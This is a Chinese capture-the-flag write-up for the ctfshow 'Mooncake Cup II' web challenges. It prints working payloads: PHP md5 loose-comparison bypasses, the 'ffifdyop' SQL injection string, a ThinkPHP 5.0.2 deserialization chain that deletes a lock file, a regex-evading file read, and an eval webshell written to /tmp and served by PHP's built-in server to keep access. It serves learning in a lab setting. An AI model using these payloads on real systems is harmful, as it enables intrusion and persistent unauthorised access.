月饼杯II

简介: 月饼杯II

web签到

<?php
//Author:H3h3QAQ
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
if (isset($_GET["YBB"])) {
    if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) {
        echo "小伙子不错嘛!!flag给你了:" . $flag;
    } else {
        echo "偶吼,带黑阔被窝抓到了!!!!";
    }
}

虚假的poc

for($a=1;$a<10000;$a++) {
    if (hash("md5", $a) == $a) {
        echo $a.PHP_EOL;
        echo hash("md5", $a);
        break;
    }
}

92

92cc227532d17e56e07902b254dfad10

脚本跑出来的92是int类型,而我们get传参进去是str类型,此时比较不成立。因此92是行不通的

真正的poc

<?php
    $str="0e";
    for($i=0;$i<=10000000000;$i++){
        $md5 = $str.$i;
        if (hash("md5",$md5)==$md5){
            echo $md5;
            break;
        }
    }
    <?php
for($i = 0; $i <= 10000000000; $i++)
{
    if (hash("md5", "0e".$i) == "0e".$i)
    {
        echo "0e".$i;
        break;
    }
}

需要传入0e215962017

自身与md5相等

0e215962017,md5后也是以0e开头

因此传入后拿到flag

双重md5下的0e绕过

以下字符串进行两次md5后以0e开头

  • 7r4lGXCH2Ksu2JNT3BYM
  • CbDLytmyGm2xQyaLNhWn
  • 770hQgrBOjrcqftrlaZk

md5 + SQL注入

使用ffifdyop,先md5再hex2bin后变成了'or'6�]��!r,��b,绕过SQL注入

eztp

代码审计

<?php
namespace app\index\controller;
class Index
{   
    public function index($run=[])
    {
        highlight_file(__FILE__);
        echo '<h1>Welcome to CTFSHOW</h1></br>';
        echo 'Powered by PHPthink5.0.2</br>';
        echo dirname(__FILE__);
    if (!empty($run[2])){
            echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=';
        }
    if (!empty($run[1])){
            unserialize($run[1]);
        }
    }
    // hint:/index/index/backdoor
    public function backdoor(){
        if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){
        echo "Try to post CMD arguments".'<br/>';
            $data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
        $cmd='cat '.$cmd;
        echo $cmd;
                system($cmd);
            }else{
                echo "No No No";
            }
        }else{
        echo dirname(__FILE__).'/../../'."install.lock has not been deleted";
    }
    }
}
ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ=
flag is not here but it is in flag.txt

这里记录一下,由于靶场没有配置隐藏入口文件,所以需要加上index.php进行访问

http://b756b813-79f6-4683-a477-5a70667dd38e.challenge.ctf.show/index.php/index/index/backdoor

通过backdoor得到执行命令,需要先删除install.lock,查看PHPthink5.0.2的反序列化漏洞

POC

<?php
namespace think\process\pipes;
use think\Process;
class Pipes{}
class Windows extends Pipes{
  private $files = [];
  function __construct(){
    $this->files = ["/var/www/html/application/index/controller/../../install.lock"];
  }
}
echo urlencode(serialize(New Windows()))."\n";
?>

O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F…%2F…%2Finstall.lock%22%3B%7D%7D

$data = input('post.');
            if (!preg_match('/flag/i',$data['cmd'])){
                $cmd = escapeshellarg($data['cmd']);
        $cmd='cat '.$cmd;
        echo $cmd;
                system($cmd);

这里escapeshellarg会给cmd加上引号,导致通配符*失效,必须完整赋值flag才能成功读取

cmd=/fl%97ag
cat '/flag'
ctfshow{6561934e-d3cb-466f-93b9-4c22bb4a8af8}

这里特殊字符的编码完美避开了正则,同时编码后也不影响linux执行命令读取flag

不要离开我

<?php
// 题目说明:
// 想办法维持权限,确定无误后提交check,通过check后,才会生成flag,此前flag不存在
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['action'];
switch($a){
    case 'cmd':
        eval($_POST['cmd']);
        break;
    case 'check':
        file_get_contents("http://checker/api/check");
        break;
    default:
        die('params not validate');
}
params not validate

思路,在其他目录下写入后门,然后check后开启php内置服务器访问后门getshell,这里需要进行延时处理

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['1']); ?>");
cmd=system("cat /tmp/index.php");

这里需要\转移一下,另外查看文件需要查看源码,不然会被直接解析

cmd=system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/");

payload,这里可以分开,也可以合并为一句payload

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");system("sleep 10 %26%26 php -S 0.0.0.0:80 -t /tmp/");

迅速提交check请求生成flag,然后直接访问即可通过后门cat /flag_ssk.txt

目录
相关文章
|
6月前
1020 月饼
1020 月饼
|
Ubuntu 测试技术 开发工具
画一个 “月饼” 陪我过中秋,玩转炫彩 “月饼” 之 基本测试
自己的画的炫彩“月饼”到了,本文就开始带大家来玩玩我们自己的月饼 ......by 矜辰所致
542 0
画一个 “月饼” 陪我过中秋,玩转炫彩 “月饼” 之 基本测试
端午特供——小朋友都会写的【狂扁·大粽子】
端午特供——小朋友都会写的【狂扁·大粽子】
116 0
月饼与乡愁
网络购物已习以为常,物资丰饶的时代,世界变得很小,飞机、高铁、高速路,还有视频电话,远方的家,触手可及
202 0
月饼与乡愁
|
物联网 大数据 程序员
不如到雄县的街头走一走
雄安新区的设立让雄县、安新、容城三个小城一夜之间举世瞩目,新区未来的5年,将迎来发展关键期,这个定位为“创新高地”的雄安新区,未来的发展怎么能少得了程序员这样的科技型从业人员?
3145 0
|
消息中间件 分布式计算 Hadoop
除了吃月饼,中秋节还能干啥? | 9月12号栖夜读
今天的首篇文章,讲述了:明天八月十五,团圆夜花好月圆之际!除了吃月饼,还能干啥?
2968 0
|
存储
1020. 月饼 (25)
#include #include #include using namespace std; //思路: 用结构体存储月饼 里面存储 月饼的数量 价格 和单价 //将月饼的单价进行排序 //根据月饼的需求 依次卖...
704 0
|
开发框架 前端开发 .NET